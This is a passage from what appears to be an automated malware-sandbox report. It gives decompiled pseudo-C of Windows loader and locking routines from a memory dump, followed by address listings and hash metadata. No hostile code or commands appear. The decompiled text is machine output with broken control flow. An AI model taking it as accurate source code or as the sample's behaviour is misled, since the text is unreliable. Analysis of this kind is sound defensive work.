									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E017D7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1795c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E017EF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E017EF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01837016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L017D2400(_t267 + 0x20);
															}
															L017D2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E017E2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E017D2280(_t134, 0x18a8608);
									__eflags =  *0x18a6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E017CFFB0(_t198, _t241, 0x18a8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x18a6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x18a8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E017E6B90(_t210,  &_v64);
										_t262 =  *0x18a8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E017EE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E017F97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E017F006A(0x18a8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x18a8608);
												E017FB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x18a6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x18a6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E017CFFB0(_t198, _t240, 0x18a8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E017F00C2(0x18a8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                    0x017e20a0
                                                    0x017e20a8
                                                    0x017e20ad
                                                    0x017e20b3
                                                    0x017e20b8
                                                    0x017e20c2
                                                    0x017e20c7
                                                    0x017e20cb
                                                    0x017e20d2
                                                    0x017e2263
                                                    0x017e2266
                                                    0x01825836
                                                    0x01825836
                                                    0x00000000
                                                    0x017e226c
                                                    0x017e226c
                                                    0x017e2270
                                                    0x017e2274
                                                    0x017e20e2
                                                    0x017e20e2
                                                    0x017e20e6
                                                    0x017e20ee
                                                    0x018257dc
                                                    0x018257de
                                                    0x018257ec
                                                    0x018257ec
                                                    0x018257f1
                                                    0x018257f3
                                                    0x018257f8
                                                    0x00000000
                                                    0x018257f8
                                                    0x018257e0
                                                    0x018257e4
                                                    0x018257ea
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x018257ea
                                                    0x017e20f4
                                                    0x017e20f4
                                                    0x017e20f8
                                                    0x017e20f8
                                                    0x017e20fc
                                                    0x017e2100
                                                    0x017e2106
                                                    0x017e2201
                                                    0x017e2206
                                                    0x017e220b
                                                    0x017e220e
                                                    0x017e22a9
                                                    0x017e22ac
                                                    0x00000000
                                                    0x00000000
                                                    0x017e22b2
                                                    0x017e22b5
                                                    0x01825801
                                                    0x01825806
                                                    0x00000000
                                                    0x00000000
                                                    0x01825810
                                                    0x01825815
                                                    0x01825818
                                                    0x00000000
                                                    0x00000000
                                                    0x0182581e
                                                    0x017e22bb
                                                    0x017e22bb
                                                    0x017e2218
                                                    0x017e2218
                                                    0x017e221c
                                                    0x017e2220
                                                    0x017e2222
                                                    0x017e22c2
                                                    0x017e22c4
                                                    0x017e22dc
                                                    0x017e22dc
                                                    0x017e22e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017e22e7
                                                    0x017e22c8
                                                    0x017e22cd
                                                    0x017e22d3
                                                    0x017e22d6
                                                    0x01825823
                                                    0x01825825
                                                    0x01825827
                                                    0x00000000
                                                    0x00000000
                                                    0x0182582d
                                                    0x00000000
                                                    0x0182582d
                                                    0x00000000
                                                    0x017e2228
                                                    0x017e2228
                                                    0x00000000
                                                    0x017e2228
                                                    0x017e2222
                                                    0x017e2214
                                                    0x017e2214
                                                    0x00000000
                                                    0x017e2114
                                                    0x017e2114
                                                    0x017e2114
                                                    0x017e211a
                                                    0x017e211c
                                                    0x017e2348
                                                    0x017e234d
                                                    0x01825840
                                                    0x01825845
                                                    0x01825848
                                                    0x0182584e
                                                    0x0182584e
                                                    0x01825848
                                                    0x017e2353
                                                    0x017e2355
                                                    0x017e2388
                                                    0x017e2388
                                                    0x017e2368
                                                    0x017e236a
                                                    0x017e236c
                                                    0x017e238f
                                                    0x00000000
                                                    0x017e236e
                                                    0x017e236e
                                                    0x017e218e
                                                    0x017e218e
                                                    0x017e2191
                                                    0x017e2195
                                                    0x01825a03
                                                    0x01825a06
                                                    0x01825a0c
                                                    0x01825a0f
                                                    0x01825a11
                                                    0x01825a13
                                                    0x01825a13
                                                    0x01825a19
                                                    0x01825a1f
                                                    0x00000000
                                                    0x017e219b
                                                    0x017e219b
                                                    0x017e21a0
                                                    0x017e2282
                                                    0x017e2284
                                                    0x017e2284
                                                    0x017e2284
                                                    0x017e2284
                                                    0x017e21a6
                                                    0x017e21a9
                                                    0x017e21ac
                                                    0x017e21ae
                                                    0x017e21b3
                                                    0x017e228b
                                                    0x017e2290
                                                    0x017e2379
                                                    0x017e2296
                                                    0x017e2298
                                                    0x017e2298
                                                    0x017e2290
                                                    0x017e21b9
                                                    0x017e21be
                                                    0x017e22a2
                                                    0x017e22a2
                                                    0x017e21c4
                                                    0x017e21c8
                                                    0x017e21cc
                                                    0x017e21d0
                                                    0x017e21d4
                                                    0x017e21de
                                                    0x017e21e3
                                                    0x01825a29
                                                    0x01825a2c
                                                    0x00000000
                                                    0x00000000
                                                    0x01825a3b
                                                    0x00000000
                                                    0x017e21e9
                                                    0x017e21e9
                                                    0x017e21e9
                                                    0x017e21ee
                                                    0x017e21f1
                                                    0x01825a45
                                                    0x01825a4b
                                                    0x01825a52
                                                    0x01825a58
                                                    0x01825a5d
                                                    0x01825a5f
                                                    0x01825a71
                                                    0x01825a61
                                                    0x01825a6a
                                                    0x01825a6a
                                                    0x01825a76
                                                    0x01825a79
                                                    0x01825a7f
                                                    0x01825a83
                                                    0x01825a85
                                                    0x01825a87
                                                    0x01825a87
                                                    0x01825a8c
                                                    0x01825a91
                                                    0x01825a97
                                                    0x01825a9f
                                                    0x01825aa0
                                                    0x01825aa1
                                                    0x01825aa6
                                                    0x01825aab
                                                    0x01825ab1
                                                    0x01825ab3
                                                    0x01825ab9
                                                    0x01825aca
                                                    0x01825ad4
                                                    0x01825ad4
                                                    0x01825ade
                                                    0x01825ade
                                                    0x01825aab
                                                    0x01825a79
                                                    0x01825a52
                                                    0x017e21f7
                                                    0x017e21f9
                                                    0x017e21fe
                                                    0x017e21fe
                                                    0x017e21e3
                                                    0x017e2195
                                                    0x017e236c
                                                    0x017e2122
                                                    0x017e2122
                                                    0x017e2124
                                                    0x017e2231
                                                    0x017e2236
                                                    0x017e2236
                                                    0x017e2238
                                                    0x017e2238
                                                    0x017e2240
                                                    0x017e2242
                                                    0x017e2244
                                                    0x018259fc
                                                    0x017e218c
                                                    0x017e218c
                                                    0x00000000
                                                    0x017e218c
                                                    0x017e224a
                                                    0x017e224f
                                                    0x017e2256
                                                    0x017e2304
                                                    0x017e2309
                                                    0x017e230f
                                                    0x017e231e
                                                    0x017e231e
                                                    0x017e231e
                                                    0x017e2320
                                                    0x017e2325
                                                    0x017e232a
                                                    0x017e232c
                                                    0x017e233e
                                                    0x017e233e
                                                    0x00000000
                                                    0x017e232c
                                                    0x017e2311
                                                    0x017e2317
                                                    0x017e231a
                                                    0x017e231c
                                                    0x017e2380
                                                    0x017e2380
                                                    0x017e2380
                                                    0x017e2384
                                                    0x00000000
                                                    0x00000000
                                                    0x017e2386
                                                    0x00000000
                                                    0x017e231c
                                                    0x017e225c
                                                    0x017e225c
                                                    0x00000000
                                                    0x017e225c
                                                    0x017e212a
                                                    0x017e2134
                                                    0x017e2138
                                                    0x017e213d
                                                    0x01825858
                                                    0x01825863
                                                    0x01825863
                                                    0x01825867
                                                    0x0182586a
                                                    0x00000000
                                                    0x00000000
                                                    0x0182586c
                                                    0x0182586c
                                                    0x01825871
                                                    0x01825875
                                                    0x01825877
                                                    0x01825997
                                                    0x0182599c
                                                    0x018259a1
                                                    0x018259a7
                                                    0x018259a7
                                                    0x00000000
                                                    0x018259a7
                                                    0x0182587d
                                                    0x00000000
                                                    0x0182588b
                                                    0x0182588b
                                                    0x01825890
                                                    0x01825892
                                                    0x01825894
                                                    0x01825899
                                                    0x0182589b
                                                    0x018258a0
                                                    0x018258a0
                                                    0x018258aa
                                                    0x018258b2
                                                    0x018258b6
                                                    0x018258be
                                                    0x018258c6
                                                    0x018258c9
                                                    0x0182590d
                                                    0x01825917
                                                    0x0182591a
                                                    0x0182591c
                                                    0x01825920
                                                    0x01825928
                                                    0x0182592a
                                                    0x0182592c
                                                    0x0182592e
                                                    0x0182592e
                                                    0x018258cb
                                                    0x018258cd
                                                    0x018258d8
                                                    0x018258e0
                                                    0x018258f4
                                                    0x018258fe
                                                    0x018258fe
                                                    0x0182593a
                                                    0x0182593e
                                                    0x01825940
                                                    0x01825942
                                                    0x00000000
                                                    0x01825944
                                                    0x01825944
                                                    0x01825949
                                                    0x0182594e
                                                    0x0182594e
                                                    0x01825953
                                                    0x0182595b
                                                    0x01825976
                                                    0x01825976
                                                    0x0182597a
                                                    0x0182597f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01825981
                                                    0x01825981
                                                    0x01825981
                                                    0x01825983
                                                    0x01825988
                                                    0x0182598d
                                                    0x01825991
                                                    0x01825991
                                                    0x00000000
                                                    0x0182595d
                                                    0x0182595d
                                                    0x01825963
                                                    0x01825965
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01825967
                                                    0x01825967
                                                    0x0182596b
                                                    0x0182596d
                                                    0x00000000
                                                    0x00000000
                                                    0x0182596f
                                                    0x01825971
                                                    0x01825971
                                                    0x01825974
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01825974
                                                    0x00000000
                                                    0x01825967
                                                    0x0182595b
                                                    0x01825942
                                                    0x01825863
                                                    0x017e2143
                                                    0x017e2143
                                                    0x017e2149
                                                    0x017e214f
                                                    0x017e22f1
                                                    0x017e22f6
                                                    0x00000000
                                                    0x017e2173
                                                    0x017e2173
                                                    0x017e217d
                                                    0x017e2181
                                                    0x017e2186
                                                    0x018259ae
                                                    0x018259b2
                                                    0x018259b5
                                                    0x018259b7
                                                    0x018259ba
                                                    0x018259cd
                                                    0x018259d1
                                                    0x018259d5
                                                    0x018259d9
                                                    0x018259db
                                                    0x00000000
                                                    0x00000000
                                                    0x018259dd
                                                    0x018259dd
                                                    0x018259e1
                                                    0x018259e4
                                                    0x018259e7
                                                    0x018259ee
                                                    0x018259ee
                                                    0x018259f3
                                                    0x018259f3
                                                    0x00000000
                                                    0x017e2186
                                                    0x017e214f
                                                    0x017e2106
                                                    0x017e2266
                                                    0x017e20d8
                                                    0x017e20da
                                                    0x017e20e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b960770cff83e295fa88d16984ea834c7a094d614f1ad0df526444dc2eb08274
                                                    • Instruction ID: 9737255671266d8cf78a88dd19d75fac45530e8b02a4d4bdfb1044c68e64d20d
                                                    • Opcode Fuzzy Hash: b960770cff83e295fa88d16984ea834c7a094d614f1ad0df526444dc2eb08274
                                                    • Instruction Fuzzy Hash: 82F115316083519FE726CF2CC44876BFBE9AF89314F08855DE995CB282D774DA81CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017CD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E017CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x18ad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E017C6600(0x18a52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x18a7b9c; // 0x0
							_t281 = L017D4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E017FF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x18a7b90; // 0x77d00000
								if(_t384 == 0) {
									_t353 =  *0x18a7b8c; // 0x1282a70
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E017D2280(_t200, 0x18a84d8);
									_t277 =  *0x18a85f4; // 0x1282f60
									_t351 =  *0x18a85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1282ef8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E017CFFB0(_t287, _t353, 0x18a84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0180CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E017C6600(0x18a52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E017C7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x18ab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0183E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x18a8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x18ab1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x18ab218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E017D2280(_t250, 0x18a84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L017F3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E017CFFB0(_t293, _t353, 0x18a84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E017F37F5(_t353, 0);
																}
																E017F0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E017E9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E017E02D6(_t174);
																}
																L017D77F0( *0x18a7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E017EC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L017CEC7F(_t353);
										L017E19B8(_t287, 0, _t353, 0);
										_t200 = E017BF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x18ab2f8 |  *0x18ab2fc) == 0 || ( *0x18ab2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E017FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x18ab2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01866B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01866AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E017CE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L017CEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E017F9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
